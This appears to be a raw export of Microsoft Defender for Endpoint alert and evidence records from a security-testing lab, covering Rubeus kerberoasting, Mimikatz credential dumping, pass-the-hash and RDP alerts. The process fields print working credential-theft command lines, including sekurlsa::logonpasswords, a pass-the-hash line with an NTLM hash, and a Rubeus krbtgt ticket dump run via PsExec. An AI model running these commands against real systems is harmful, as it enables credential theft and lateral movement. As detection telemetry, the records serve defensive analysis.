"a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-09-30T06:16:01.4666667Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043451806873428_1564497180
aa5292eb-a8e6-44fa-873c-ace9c135380d
741
MicrosoftDefenderForEndpoint
2022-11-18T05:13:00.6873733Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:54.5551695Z
2022-11-18T05:13:55.0820617Z
Possible use of the Rubeus kerberoasting tool
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication. During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
SuspiciousActivity
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
6606ef29-d293-4f24-a7c5-334dcb40b412
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:13:00.7233333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:13:00.7233333Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:09:31.3384203Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 9516, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-18T05:09:53.5918073Z", "processId": 10756, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:13:00.7233333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:09:31.2191789Z", "parentProcessFileName": "mimikatz.exe", "parentProcessFilePath": "C:\\M365DAttack\\Mimikatz\\x64", "parentProcessId": 6500, "processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1", "processCreationTime": "2022-11-18T05:09:31.3384203Z", "processId": 9516, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:16:36.6666667Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:13:25.0228269Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 6668, "processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1", "processCreationTime": "2022-11-18T05:13:25.1660869Z", "processId": 8932, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:16:36.6666667Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:13:25.1660869Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 8932, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-18T05:13:54.2769151Z", "processId": 9704, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:59:45.07Z
Suspicious
None
steve
lab.net
S-1-5-21-2159906967-4174806019-1002223092-1107
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:59:44.16Z
Suspicious
None
Defender
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-500
null
Defender@msdxv8.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
356
"powershell.exe"
2022-12-22T08:28:16.1808894Z
6,960
2022-12-22T08:27:20.6569514Z
explorer.exe
C:\Windows
Detected
3ad3fb0567038c2ec2e59e76690c2e6c01253af9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:20:16.0633333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
4,732
cmd.exe /c whoami
2022-11-11T08:17:06.0711978Z
4,704
2022-11-11T08:16:44.2952776Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:44:33.8433333Z
Suspicious
None
darol
corp.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638055769413201201_1744203370
049bd8f3-f5e5-407f-acc6-da2e1ca8c09b
792
MicrosoftDefenderForEndpoint
2022-12-02T11:22:21.3201428Z
2022-12-02T11:28:04.72Z
2022-12-02T11:28:04.7045617Z
2022-12-02T11:10:49.9477752Z
2022-12-02T11:10:49.9477752Z
'Emali' malware was detected
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks. This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Malware
Resolved
Informational
55
SuccessfullyRemediated
null
null
WindowsDefenderAv
d60f5b90-ecd8-4d77-8186-a801597ec762
Automation
null
Emali
[]
[ { "aadDeviceId": "7711ee94-033f-495e-bc7a-53e7c1e57111", "defenderAvStatus": "NotSupported", "deviceDnsName": "prod.env", "firstSeen": "2022-09-19T08:40:31.865Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "252919130a29cc07e305c5c4ef99e5435b96b889", "onboardingStatus": "Onboarded", "osBuild": 22000, "osPlatform": "Windows11", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Informational", "tags": [ "Full auto", "test Tag 2" ], "version": "21H2", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10A", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "77cf6d06-c483-4fb3-a859-9bbd9c9ac8e2" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "252919130a29cc07e305c5c4ef99e5435b96b889", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-02T11:22:21.4Z", "fileName": "5a47e113-c12a-6c07-22e6-70ca415962b0_1d90706ccf4329b", "filePath": "c:\\programdata\\microsoft\\windows defender\\scans\\filesstash", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Blocked", "remediationStatusDetails": "Entity was pre-remediated by Windows Defender", "sha1": "46a01aa999843c55eb8ef7031c1db0d23ee30342", "sha256": "670b00e90a7c9eb7ac6674441551e7764a8364c26e44dcc92474a9abcfac4c04", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:15.4333333Z
Malicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T05:36:50.2133333Z
Suspicious
None
jeff
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:12:17.4466667Z
Suspicious
None
root
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043453192898257_1865472665
e9285afd-4a8a-4056-9195-9e985d0c36cc
741
MicrosoftDefenderForEndpoint
2022-11-18T05:15:19.2898457Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:12:56.0091301Z
2022-11-18T05:13:27.6605742Z
Suspicious RDP session
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
SuspiciousActivity
Resolved
High
47
PartiallyInvestigated
TruePositive
SecurityTesting
WindowsDefenderAtp
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1021.001", "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Critical", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:15:19.35Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:15:19.35Z", "fileName": "Rubeus.exe", "filePath": "\\\\msdxv2-win10b\\C$\\Temp", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:15:19.35Z", "fileName": "xcopy.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "a2d8e1a994cb7d774da09896cbb275238268b085", "sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Clean" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:15:19.35Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Remediated", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001151822254609_781603445
20d3c0ee-af20-47bf-84df-a7808daa1048
486
MicrosoftDefenderForEndpoint
2022-09-30T06:13:02.225481Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:55.8115473Z
2022-09-30T06:11:55.8115473Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "corp.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:13:02.38Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:13:02.38Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:13.210308Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4064, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-09-30T06:11:52.7127433Z", "processId": 2596, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T17:35:03.0466667Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:45.81Z
Suspicious
None
jeff
lab.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:15.65Z
Suspicious
None
jeff
lab.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:39.9733333Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
3,516
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe dir \\msdxv2-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit
2022-11-21T02:01:38.4465922Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:10:33.7633333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
6,500
type secret.txt
2022-11-18T05:09:31.2191789Z
4,976
2022-11-18T05:04:12.7150402Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:53.9566667Z
Suspicious
Active
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
11,068
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe dir \\msdxv2-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit
2022-09-30T06:11:53.2107428Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:05:51.15Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T13:27:33.96Z
Suspicious
None
darol
test.domain
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043451806149103_-1025772494
a68087cb-35ec-44ae-a5f8-540ac69855d5
741
MicrosoftDefenderForEndpoint
2022-11-18T05:13:00.6149339Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:59.1103424Z
2022-11-18T05:09:59.1166451Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:13:00.6633333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-11-18T05:13:00.6633333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, 